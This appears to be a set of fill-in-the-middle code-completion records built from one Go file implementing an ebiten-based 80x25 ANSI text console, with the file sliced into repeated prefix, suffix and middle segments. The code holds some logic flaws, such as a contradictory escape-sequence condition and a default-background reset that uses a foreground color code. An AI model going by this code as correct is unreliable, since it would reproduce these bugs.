case v == '8' && parseMode: // DEC primitive restore cursor position
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == '[' && parseMode: // Control Sequence Introducer
csi = true
s = ""
case v == 'c' && csi: // Reset display to initial state
c.clear()
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
parseMode = false
csi = false
continue
case v == 'm' && csi:
sv := strings.Split(s, ";")
//bold := false
for _, j := range sv {
if j == "" {
continue
} else if j == "0" {
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
continue
} else if j == "1" {
//bool = true
continue
} else if j == "39" { // Default foreground color
c.fgColor, _ = colorParserFg(37)
continue
} else if j == "49" { // Default background color
c.bgColor, _ = colorParserBg(37)
continue
} else {
i, err := strconv.Atoi(j)
if err != nil {
fmt.Println(err, "code:", s)
continue
}
fgColor, ok := colorParserFg(i)
if ok {
c.fgColor = fgColor
continue
}
bgColor, ok := colorParserBg(i)
if ok {
c.bgColor = bgColor
continue
}
fmt.Println("ANSI code not implemented:", i)
}
}
parseMode = false
csi = false
case v == 'd' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
cpos := i * columns
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 's' && csi:
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == 'u' && csi:
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == 'A' && csi: // Cursor up
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'B' && csi: // Cursor down
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil |
}
c.cursor += i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'C' && csi: // Cursor forward
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor += i
c.cursorLimit()
parseMode = false
csi = false
case v == 'D' && csi: // Cursor back
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i
c.cursorLimit()
parseMode = false
csi = false
case v == 'G' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
lin := int(c.cursor / columns)
cpos := lin*columns + i
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 'f' && csi: // the same as H
fallthrough
case v == 'H' && csi: // set horizontal and vertical position
if s == "" {
c.cursor = 0
} else {
sv := strings.Split(s, ";")
if len(sv) == 2 {
lin, _ := strconv.Atoi(sv[0])
col, _ := strconv.Atoi(sv[1])
cpos := lin*columns + col
if cpos <= 2000 { // 25*80
c.cursor = cpos
}
}
}
parseMode = false
csi = false
case v == 'X' && csi: // Erase n characters from the current position
cpos := c.cursor
i := 1
if s != "" {
i, _ = strconv.Atoi(s)
}
for x := 1; x <= i; x++ {
if cpos+x < 2000 {
c.videoTextMemory[cpos+x].charID = ' '
}
}
c.cursor = cpos
parseMode = false
csi = false
case v == 'J' && csi:
if len(s) > 0 {
if s[0] == '2' {
c.clear()
}
}
parseMode = false
csi = false
case v >= 'a' &&
v <= 'z' &&
v <= 'A' &&
v <= 'Z' &&
parseMode:
parseMode = false
csi = false
case csi || parseMode:
s += string(v)
default:
c.put(int(msg[i]))
}
}
}
func (c *Console) set(x, y int, color color) {
p := 4*y*c.width + 4*x
c.img.Pix[p] = color.R
c.img.Pix[p+1] = color.G
c.img.Pix[p+2] = color.B
c.img.Pix[p+3] = 0xff
}
func (c *Console) drawCursor(index int, fgColor, bgColor color, x, y int) {
if c.cursorSetBlink {
if c.cursorBlinkTimer < 15 {
fgColor, bgColor = bgColor, fgColor
}
c.drawChar(index, fgColor, bgColor, x, y)
c.cursorBlinkTimer++
if c.cursorBlinkTimer > 30 {
c.cursorBlinkTimer = 0
}
return
}
c.drawChar(index, bgColor, fgColor, x, y)
}
func (c *Console) drawChar(index int, fgColor, bgColor color, x, y int) {
var (
a int
b int
lColor color
)
x = x * 9
y = y * 16
for b = 0; b < 16; b++ {
for a = 0; a < 9; a++ {
if a == 8 {
color := bgColor
if index >= 192 && index <= 223 {
color = lColor
}
c.set(a+x, b+y, color)
continue
}
i := index*16 + b
if bitmap[i]&(0x80>>a) != 0 {
lColor = fgColor
c.set(a+x, b+y, lColor)
continue
}
lColor = bgColor
c.set(a+x, b+y, lColor)
}
}
}
| {
fmt.Println(err)
} | conditional_block |
console.go | package console
import (
"fmt"
"image"
"strconv"
"strings"
"github.com/hajimehoshi/ebiten/v2"
)
type color struct {
R byte
G byte
B byte
}
type char struct {
charID int
fgColor color
bgColor color
blink bool
}
type Console struct {
videoTextMemory [25 * 80]char
fgColor color
bgColor color
auxCursorPos int
cursor int
height int
width int
scale float64
cursorSetBlink bool
cursorBlinkTimer int
tmpScreen *ebiten.Image
img *image.RGBA
title string
font struct {
height int
width int
bitmap []byte
}
}
func (c *Console) Write(p []byte) (n int, err error) {
c.Print(string(p))
return len(p), nil
}
func colorParserFg(i int) (color, bool) {
fg := make(map[int]color, 16)
fg[30] = color{0, 0, 0} // Black
fg[31] = color{170, 0, 0} // Red
fg[32] = color{0, 170, 0} // Green
fg[33] = color{170, 85, 0} // Yellow
fg[34] = color{0, 0, 170} // Blue
fg[35] = color{170, 0, 170} // Magenta
fg[36] = color{0, 170, 170} // Cyan
fg[37] = color{170, 170, 170} // White
fg[90] = color{85, 85, 85} // Bright Black (Gray)
fg[91] = color{255, 85, 85} // Bright Red
fg[92] = color{85, 255, 85} // Bright Green
fg[93] = color{255, 255, 85} // Bright Yellow
fg[94] = color{85, 85, 255} // Bright Blue
fg[95] = color{255, 85, 255} // Bright Magenta
fg[96] = color{85, 255, 255} // Bright Cyan
fg[97] = color{255, 255, 255} // Bright White
c, ok := fg[i]
return c, ok
}
func colorParserBg(i int) (color, bool) {
bg := make(map[int]color, 16)
bg[40] = color{0, 0, 0} // Black
bg[41] = color{170, 0, 0} // Red
bg[42] = color{0, 170, 0} // Green
bg[43] = color{170, 85, 0} // Yellow
bg[44] = color{0, 0, 170} // Blue
bg[45] = color{170, 0, 170} // Magenta
bg[46] = color{0, 170, 170} // Cyan
bg[47] = color{170, 170, 170} // White
bg[100] = color{85, 85, 85} // Bright Black (Gray)
bg[101] = color{255, 85, 85} // Bright Red
bg[102] = color{85, 255, 85} // Bright Green
bg[103] = color{255, 255, 85} // Bright Yellow
bg[104] = color{85, 85, 255} // Bright Blue
bg[105] = color{255, 85, 255} // Bright Magenta
bg[106] = color{85, 255, 255} // Bright Cyan
bg[107] = color{255, 255, 255} // Bright White
c, ok := bg[i]
return c, ok
}
| c.fgColor, _ = colorParserFg(37)
c.width = 80 * 9
c.height = 25 * 16
c.scale = 1.5
c.title = "term"
c.cursorSetBlink = true
c.img = image.NewRGBA(image.Rect(0, 0, c.width, c.height))
c.tmpScreen = ebiten.NewImage(c.width, c.height)
c.font.bitmap = bitmap
c.font.height = 16
c.font.width = 9
c.clear()
return c
}
func (c *Console) Run() (err error) {
// SetRunnableOnUnfocused
ebiten.SetRunnableOnUnfocused(true)
ebiten.SetWindowSize(c.width, c.height)
ebiten.SetWindowTitle(c.title)
err = ebiten.RunGame(c)
return err
}
func (c *Console) input() {
var r rune
for c := 'A'; c <= 'Z'; c++ {
if ebiten.IsKeyPressed(ebiten.Key(c) - 'A' + ebiten.KeyA) {
if ebiten.IsKeyPressed(ebiten.KeyShift) {
r = c
}
r = (c + 32) // convert to lowercase
fmt.Println(string(r))
}
}
}
func (c *Console) Update() error {
c.input()
c.drawText()
return nil
}
func (c *Console) Layout(outsideWidth, outsideHeight int) (int, int) {
return c.width, c.height
}
func (c *Console) Draw(screen *ebiten.Image) {
c.tmpScreen.ReplacePixels(c.img.Pix)
screen.DrawImage(c.tmpScreen, nil)
}
func (c *Console) clear() {
c.cursor = 0
for i := 0; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) drawText() {
i := 0
rows := 25
columns := 80
for row := 0; row < rows; row++ {
for col := 0; col < columns; col++ {
v := c.videoTextMemory[i]
if i == c.cursor {
c.drawCursor(v.charID, v.fgColor, v.bgColor, col, row)
} else {
c.drawChar(v.charID, v.fgColor, v.bgColor, col, row)
}
i++
}
}
}
func (c *Console) moveUp() {
columns := 80
copy(c.videoTextMemory[0:], c.videoTextMemory[columns:])
for i := len(c.videoTextMemory) - columns; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) put(charID int) {
c.videoTextMemory[c.cursor].fgColor = c.fgColor
c.videoTextMemory[c.cursor].bgColor = c.bgColor
c.videoTextMemory[c.cursor].charID = charID
c.cursor++
c.cursorLimit()
}
func (c *Console) cursorLimit() {
if c.cursor < 0 {
c.cursor = 0
return
}
columns := 80
rows := 25
for c.cursor >= rows*columns {
c.cursor -= columns
c.moveUp()
}
}
func (c *Console) Print(msg string) {
columns := 80
parseMode := false
csi := false
s := ""
for i := 0; i < len(msg); i++ {
v := msg[i]
switch {
case v == 7: // bell
// not implemented
case v == 8: // Backspace
c.cursor--
c.cursorLimit()
case v == 9: // tab \t
lin := int(c.cursor / columns)
col := int(c.cursor % columns)
ncol := int(col/4)*4 + 4 // tab size 4 and remove mod
c.cursor = lin*columns + ncol
c.cursorLimit()
case v == 10: // Line Feed, \n
c.cursor += columns
c.cursorLimit()
case v == 11: // Vertical tab
// not implemented
case v == 12: // Formfeed
// not implemented
case v == 13: // Carriage return \r
c.cursor = int(c.cursor/columns) * columns
c.cursorLimit()
case v == 27:
parseMode = true
case v == '7' && parseMode: // DEC primitive save cursor position
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == '8' && parseMode: // DEC primitive restore cursor position
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == '[' && parseMode: // Control Sequence Introducer
csi = true
s = ""
case v == 'c' && csi: // Reset display to initial state
c.clear()
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
parseMode = false
csi = false
continue
case v == 'm' && csi:
sv := strings.Split(s, ";")
//bold := false
for _, j := range sv {
if j == "" {
continue
} else if j == "0" {
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
continue
} else if j == "1" {
//bool = true
continue
} else if j == "39" { // Default foreground color
c.fgColor, _ = colorParserFg(37)
continue
} else if j == "49" { // Default background color
c.bgColor, _ = colorParserBg(37)
continue
} else {
i, err := strconv.Atoi(j)
if err != nil {
fmt.Println(err, "code:", s)
continue
}
fgColor, ok := colorParserFg(i)
if ok {
c.fgColor = fgColor
continue
}
bgColor, ok := colorParserBg(i)
if ok {
c.bgColor = bgColor
continue
}
fmt.Println("ANSI code not implemented:", i)
}
}
parseMode = false
csi = false
case v == 'd' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
cpos := i * columns
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 's' && csi:
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == 'u' && csi:
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == 'A' && csi: // Cursor up
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'B' && csi: // Cursor down
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor += i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'C' && csi: // Cursor forward
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor += i
c.cursorLimit()
parseMode = false
csi = false
case v == 'D' && csi: // Cursor back
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i
c.cursorLimit()
parseMode = false
csi = false
case v == 'G' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
lin := int(c.cursor / columns)
cpos := lin*columns + i
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 'f' && csi: // the same as H
fallthrough
case v == 'H' && csi: // set horizontal and vertical position
if s == "" {
c.cursor = 0
} else {
sv := strings.Split(s, ";")
if len(sv) == 2 {
lin, _ := strconv.Atoi(sv[0])
col, _ := strconv.Atoi(sv[1])
cpos := lin*columns + col
if cpos <= 2000 { // 25*80
c.cursor = cpos
}
}
}
parseMode = false
csi = false
case v == 'X' && csi: // Erase n characters from the current position
cpos := c.cursor
i := 1
if s != "" {
i, _ = strconv.Atoi(s)
}
for x := 1; x <= i; x++ {
if cpos+x < 2000 {
c.videoTextMemory[cpos+x].charID = ' '
}
}
c.cursor = cpos
parseMode = false
csi = false
case v == 'J' && csi:
if len(s) > 0 {
if s[0] == '2' {
c.clear()
}
}
parseMode = false
csi = false
case v >= 'a' &&
v <= 'z' &&
v <= 'A' &&
v <= 'Z' &&
parseMode:
parseMode = false
csi = false
case csi || parseMode:
s += string(v)
default:
c.put(int(msg[i]))
}
}
}
func (c *Console) set(x, y int, color color) {
p := 4*y*c.width + 4*x
c.img.Pix[p] = color.R
c.img.Pix[p+1] = color.G
c.img.Pix[p+2] = color.B
c.img.Pix[p+3] = 0xff
}
func (c *Console) drawCursor(index int, fgColor, bgColor color, x, y int) {
if c.cursorSetBlink {
if c.cursorBlinkTimer < 15 {
fgColor, bgColor = bgColor, fgColor
}
c.drawChar(index, fgColor, bgColor, x, y)
c.cursorBlinkTimer++
if c.cursorBlinkTimer > 30 {
c.cursorBlinkTimer = 0
}
return
}
c.drawChar(index, bgColor, fgColor, x, y)
}
func (c *Console) drawChar(index int, fgColor, bgColor color, x, y int) {
var (
a int
b int
lColor color
)
x = x * 9
y = y * 16
for b = 0; b < 16; b++ {
for a = 0; a < 9; a++ {
if a == 8 {
color := bgColor
if index >= 192 && index <= 223 {
color = lColor
}
c.set(a+x, b+y, color)
continue
}
i := index*16 + b
if bitmap[i]&(0x80>>a) != 0 {
lColor = fgColor
c.set(a+x, b+y, lColor)
continue
}
lColor = bgColor
c.set(a+x, b+y, lColor)
}
}
} | func New() *Console {
c := &Console{}
c.bgColor, _ = colorParserBg(40) | random_line_split |
console.go | package console
import (
"fmt"
"image"
"strconv"
"strings"
"github.com/hajimehoshi/ebiten/v2"
)
type color struct {
R byte
G byte
B byte
}
type char struct {
charID int
fgColor color
bgColor color
blink bool
}
type Console struct {
videoTextMemory [25 * 80]char
fgColor color
bgColor color
auxCursorPos int
cursor int
height int
width int
scale float64
cursorSetBlink bool
cursorBlinkTimer int
tmpScreen *ebiten.Image
img *image.RGBA
title string
font struct {
height int
width int
bitmap []byte
}
}
func (c *Console) Write(p []byte) (n int, err error) {
c.Print(string(p))
return len(p), nil
}
func colorParserFg(i int) (color, bool) {
fg := make(map[int]color, 16)
fg[30] = color{0, 0, 0} // Black
fg[31] = color{170, 0, 0} // Red
fg[32] = color{0, 170, 0} // Green
fg[33] = color{170, 85, 0} // Yellow
fg[34] = color{0, 0, 170} // Blue
fg[35] = color{170, 0, 170} // Magenta
fg[36] = color{0, 170, 170} // Cyan
fg[37] = color{170, 170, 170} // White
fg[90] = color{85, 85, 85} // Bright Black (Gray)
fg[91] = color{255, 85, 85} // Bright Red
fg[92] = color{85, 255, 85} // Bright Green
fg[93] = color{255, 255, 85} // Bright Yellow
fg[94] = color{85, 85, 255} // Bright Blue
fg[95] = color{255, 85, 255} // Bright Magenta
fg[96] = color{85, 255, 255} // Bright Cyan
fg[97] = color{255, 255, 255} // Bright White
c, ok := fg[i]
return c, ok
}
func colorParserBg(i int) (color, bool) {
bg := make(map[int]color, 16)
bg[40] = color{0, 0, 0} // Black
bg[41] = color{170, 0, 0} // Red
bg[42] = color{0, 170, 0} // Green
bg[43] = color{170, 85, 0} // Yellow
bg[44] = color{0, 0, 170} // Blue
bg[45] = color{170, 0, 170} // Magenta
bg[46] = color{0, 170, 170} // Cyan
bg[47] = color{170, 170, 170} // White
bg[100] = color{85, 85, 85} // Bright Black (Gray)
bg[101] = color{255, 85, 85} // Bright Red
bg[102] = color{85, 255, 85} // Bright Green
bg[103] = color{255, 255, 85} // Bright Yellow
bg[104] = color{85, 85, 255} // Bright Blue
bg[105] = color{255, 85, 255} // Bright Magenta
bg[106] = color{85, 255, 255} // Bright Cyan
bg[107] = color{255, 255, 255} // Bright White
c, ok := bg[i]
return c, ok
}
func New() *Console {
c := &Console{}
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
c.width = 80 * 9
c.height = 25 * 16
c.scale = 1.5
c.title = "term"
c.cursorSetBlink = true
c.img = image.NewRGBA(image.Rect(0, 0, c.width, c.height))
c.tmpScreen = ebiten.NewImage(c.width, c.height)
c.font.bitmap = bitmap
c.font.height = 16
c.font.width = 9
c.clear()
return c
}
func (c *Console) Run() (err error) {
// SetRunnableOnUnfocused
ebiten.SetRunnableOnUnfocused(true)
ebiten.SetWindowSize(c.width, c.height)
ebiten.SetWindowTitle(c.title)
err = ebiten.RunGame(c)
return err
}
func (c *Console) input() {
var r rune
for c := 'A'; c <= 'Z'; c++ {
if ebiten.IsKeyPressed(ebiten.Key(c) - 'A' + ebiten.KeyA) {
if ebiten.IsKeyPressed(ebiten.KeyShift) {
r = c
}
r = (c + 32) // convert to lowercase
fmt.Println(string(r))
}
}
}
func (c *Console) Update() error {
c.input()
c.drawText()
return nil
}
func (c *Console) Layout(outsideWidth, outsideHeight int) (int, int) {
return c.width, c.height
}
func (c *Console) Draw(screen *ebiten.Image) {
c.tmpScreen.ReplacePixels(c.img.Pix)
screen.DrawImage(c.tmpScreen, nil)
}
func (c *Console) clear() {
c.cursor = 0
for i := 0; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) drawText() {
i := 0
rows := 25
columns := 80
for row := 0; row < rows; row++ {
for col := 0; col < columns; col++ {
v := c.videoTextMemory[i]
if i == c.cursor {
c.drawCursor(v.charID, v.fgColor, v.bgColor, col, row)
} else {
c.drawChar(v.charID, v.fgColor, v.bgColor, col, row)
}
i++
}
}
}
func (c *Console) moveUp() {
columns := 80
copy(c.videoTextMemory[0:], c.videoTextMemory[columns:])
for i := len(c.videoTextMemory) - columns; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) | (charID int) {
c.videoTextMemory[c.cursor].fgColor = c.fgColor
c.videoTextMemory[c.cursor].bgColor = c.bgColor
c.videoTextMemory[c.cursor].charID = charID
c.cursor++
c.cursorLimit()
}
func (c *Console) cursorLimit() {
if c.cursor < 0 {
c.cursor = 0
return
}
columns := 80
rows := 25
for c.cursor >= rows*columns {
c.cursor -= columns
c.moveUp()
}
}
func (c *Console) Print(msg string) {
columns := 80
parseMode := false
csi := false
s := ""
for i := 0; i < len(msg); i++ {
v := msg[i]
switch {
case v == 7: // bell
// not implemented
case v == 8: // Backspace
c.cursor--
c.cursorLimit()
case v == 9: // tab \t
lin := int(c.cursor / columns)
col := int(c.cursor % columns)
ncol := int(col/4)*4 + 4 // tab size 4 and remove mod
c.cursor = lin*columns + ncol
c.cursorLimit()
case v == 10: // Line Feed, \n
c.cursor += columns
c.cursorLimit()
case v == 11: // Vertical tab
// not implemented
case v == 12: // Formfeed
// not implemented
case v == 13: // Carriage return \r
c.cursor = int(c.cursor/columns) * columns
c.cursorLimit()
case v == 27:
parseMode = true
case v == '7' && parseMode: // DEC primitive save cursor position
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == '8' && parseMode: // DEC primitive restore cursor position
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == '[' && parseMode: // Control Sequence Introducer
csi = true
s = ""
case v == 'c' && csi: // Reset display to initial state
c.clear()
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
parseMode = false
csi = false
continue
case v == 'm' && csi:
sv := strings.Split(s, ";")
//bold := false
for _, j := range sv {
if j == "" {
continue
} else if j == "0" {
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
//bold = false
continue
} else if j == "1" {
//bool = true
continue
} else if j == "39" { // Default foreground color
c.fgColor, _ = colorParserFg(37)
continue
} else if j == "49" { // Default background color
c.bgColor, _ = colorParserBg(37)
continue
} else {
i, err := strconv.Atoi(j)
if err != nil {
fmt.Println(err, "code:", s)
continue
}
fgColor, ok := colorParserFg(i)
if ok {
c.fgColor = fgColor
continue
}
bgColor, ok := colorParserBg(i)
if ok {
c.bgColor = bgColor
continue
}
fmt.Println("ANSI code not implemented:", i)
}
}
parseMode = false
csi = false
case v == 'd' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
cpos := i * columns
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 's' && csi:
c.auxCursorPos = c.cursor // Save cursor position
parseMode = false
csi = false
case v == 'u' && csi:
c.cursor = c.auxCursorPos // Restore cursor position
parseMode = false
csi = false
case v == 'A' && csi: // Cursor up
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'B' && csi: // Cursor down
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor += i * columns
c.cursorLimit()
parseMode = false
csi = false
case v == 'C' && csi: // Cursor forward
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor += i
c.cursorLimit()
parseMode = false
csi = false
case v == 'D' && csi: // Cursor back
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
c.cursor -= i
c.cursorLimit()
parseMode = false
csi = false
case v == 'G' && csi:
i := 1
if s != "" {
var err error
i, err = strconv.Atoi(s)
if err != nil {
fmt.Println(err)
}
}
lin := int(c.cursor / columns)
cpos := lin*columns + i
if cpos < 2000 {
c.cursor = cpos
}
parseMode = false
csi = false
case v == 'f' && csi: // the same as H
fallthrough
case v == 'H' && csi: // set horizontal and vertical position
if s == "" {
c.cursor = 0
} else {
sv := strings.Split(s, ";")
if len(sv) == 2 {
lin, _ := strconv.Atoi(sv[0])
col, _ := strconv.Atoi(sv[1])
cpos := lin*columns + col
if cpos <= 2000 { // 25*80
c.cursor = cpos
}
}
}
parseMode = false
csi = false
case v == 'X' && csi: // Erase n characters from the current position
cpos := c.cursor
i := 1
if s != "" {
i, _ = strconv.Atoi(s)
}
for x := 1; x <= i; x++ {
if cpos+x < 2000 {
c.videoTextMemory[cpos+x].charID = ' '
}
}
c.cursor = cpos
parseMode = false
csi = false
case v == 'J' && csi:
if len(s) > 0 {
if s[0] == '2' {
c.clear()
}
}
parseMode = false
csi = false
case v >= 'a' &&
v <= 'z' &&
v <= 'A' &&
v <= 'Z' &&
parseMode:
parseMode = false
csi = false
case csi || parseMode:
s += string(v)
default:
c.put(int(msg[i]))
}
}
}
func (c *Console) set(x, y int, color color) {
p := 4*y*c.width + 4*x
c.img.Pix[p] = color.R
c.img.Pix[p+1] = color.G
c.img.Pix[p+2] = color.B
c.img.Pix[p+3] = 0xff
}
func (c *Console) drawCursor(index int, fgColor, bgColor color, x, y int) {
if c.cursorSetBlink {
if c.cursorBlinkTimer < 15 {
fgColor, bgColor = bgColor, fgColor
}
c.drawChar(index, fgColor, bgColor, x, y)
c.cursorBlinkTimer++
if c.cursorBlinkTimer > 30 {
c.cursorBlinkTimer = 0
}
return
}
c.drawChar(index, bgColor, fgColor, x, y)
}
func (c *Console) drawChar(index int, fgColor, bgColor color, x, y int) {
var (
a int
b int
lColor color
)
x = x * 9
y = y * 16
for b = 0; b < 16; b++ {
for a = 0; a < 9; a++ {
if a == 8 {
color := bgColor
if index >= 192 && index <= 223 {
color = lColor
}
c.set(a+x, b+y, color)
continue
}
i := index*16 + b
if bitmap[i]&(0x80>>a) != 0 {
lColor = fgColor
c.set(a+x, b+y, lColor)
continue
}
lColor = bgColor
c.set(a+x, b+y, lColor)
}
}
}
| put | identifier_name |
console.go | package console
import (
"fmt"
"image"
"strconv"
"strings"
"github.com/hajimehoshi/ebiten/v2"
)
type color struct {
R byte
G byte
B byte
}
type char struct {
charID int
fgColor color
bgColor color
blink bool
}
type Console struct {
videoTextMemory [25 * 80]char
fgColor color
bgColor color
auxCursorPos int
cursor int
height int
width int
scale float64
cursorSetBlink bool
cursorBlinkTimer int
tmpScreen *ebiten.Image
img *image.RGBA
title string
font struct {
height int
width int
bitmap []byte
}
}
func (c *Console) Write(p []byte) (n int, err error) {
c.Print(string(p))
return len(p), nil
}
func colorParserFg(i int) (color, bool) {
fg := make(map[int]color, 16)
fg[30] = color{0, 0, 0} // Black
fg[31] = color{170, 0, 0} // Red
fg[32] = color{0, 170, 0} // Green
fg[33] = color{170, 85, 0} // Yellow
fg[34] = color{0, 0, 170} // Blue
fg[35] = color{170, 0, 170} // Magenta
fg[36] = color{0, 170, 170} // Cyan
fg[37] = color{170, 170, 170} // White
fg[90] = color{85, 85, 85} // Bright Black (Gray)
fg[91] = color{255, 85, 85} // Bright Red
fg[92] = color{85, 255, 85} // Bright Green
fg[93] = color{255, 255, 85} // Bright Yellow
fg[94] = color{85, 85, 255} // Bright Blue
fg[95] = color{255, 85, 255} // Bright Magenta
fg[96] = color{85, 255, 255} // Bright Cyan
fg[97] = color{255, 255, 255} // Bright White
c, ok := fg[i]
return c, ok
}
func colorParserBg(i int) (color, bool) {
bg := make(map[int]color, 16)
bg[40] = color{0, 0, 0} // Black
bg[41] = color{170, 0, 0} // Red
bg[42] = color{0, 170, 0} // Green
bg[43] = color{170, 85, 0} // Yellow
bg[44] = color{0, 0, 170} // Blue
bg[45] = color{170, 0, 170} // Magenta
bg[46] = color{0, 170, 170} // Cyan
bg[47] = color{170, 170, 170} // White
bg[100] = color{85, 85, 85} // Bright Black (Gray)
bg[101] = color{255, 85, 85} // Bright Red
bg[102] = color{85, 255, 85} // Bright Green
bg[103] = color{255, 255, 85} // Bright Yellow
bg[104] = color{85, 85, 255} // Bright Blue
bg[105] = color{255, 85, 255} // Bright Magenta
bg[106] = color{85, 255, 255} // Bright Cyan
bg[107] = color{255, 255, 255} // Bright White
c, ok := bg[i]
return c, ok
}
func New() *Console {
c := &Console{}
c.bgColor, _ = colorParserBg(40)
c.fgColor, _ = colorParserFg(37)
c.width = 80 * 9
c.height = 25 * 16
c.scale = 1.5
c.title = "term"
c.cursorSetBlink = true
c.img = image.NewRGBA(image.Rect(0, 0, c.width, c.height))
c.tmpScreen = ebiten.NewImage(c.width, c.height)
c.font.bitmap = bitmap
c.font.height = 16
c.font.width = 9
c.clear()
return c
}
func (c *Console) Run() (err error) {
// SetRunnableOnUnfocused
ebiten.SetRunnableOnUnfocused(true)
ebiten.SetWindowSize(c.width, c.height)
ebiten.SetWindowTitle(c.title)
err = ebiten.RunGame(c)
return err
}
func (c *Console) input() {
var r rune
for c := 'A'; c <= 'Z'; c++ {
if ebiten.IsKeyPressed(ebiten.Key(c) - 'A' + ebiten.KeyA) {
if ebiten.IsKeyPressed(ebiten.KeyShift) {
r = c
}
r = (c + 32) // convert to lowercase
fmt.Println(string(r))
}
}
}
func (c *Console) Update() error {
c.input()
c.drawText()
return nil
}
func (c *Console) Layout(outsideWidth, outsideHeight int) (int, int) {
return c.width, c.height
}
func (c *Console) Draw(screen *ebiten.Image) {
c.tmpScreen.ReplacePixels(c.img.Pix)
screen.DrawImage(c.tmpScreen, nil)
}
func (c *Console) clear() {
c.cursor = 0
for i := 0; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) drawText() {
i := 0
rows := 25
columns := 80
for row := 0; row < rows; row++ {
for col := 0; col < columns; col++ {
v := c.videoTextMemory[i]
if i == c.cursor {
c.drawCursor(v.charID, v.fgColor, v.bgColor, col, row)
} else {
c.drawChar(v.charID, v.fgColor, v.bgColor, col, row)
}
i++
}
}
}
func (c *Console) moveUp() {
columns := 80
copy(c.videoTextMemory[0:], c.videoTextMemory[columns:])
for i := len(c.videoTextMemory) - columns; i < len(c.videoTextMemory); i++ {
c.videoTextMemory[i].charID = ' '
c.videoTextMemory[i].bgColor = c.bgColor
c.videoTextMemory[i].fgColor = c.fgColor
c.videoTextMemory[i].blink = false
}
}
func (c *Console) put(charID int) {
c.videoTextMemory[c.cursor].fgColor = c.fgColor
c.videoTextMemory[c.cursor].bgColor = c.bgColor
c.videoTextMemory[c.cursor].charID = charID
c.cursor++
c.cursorLimit()
}
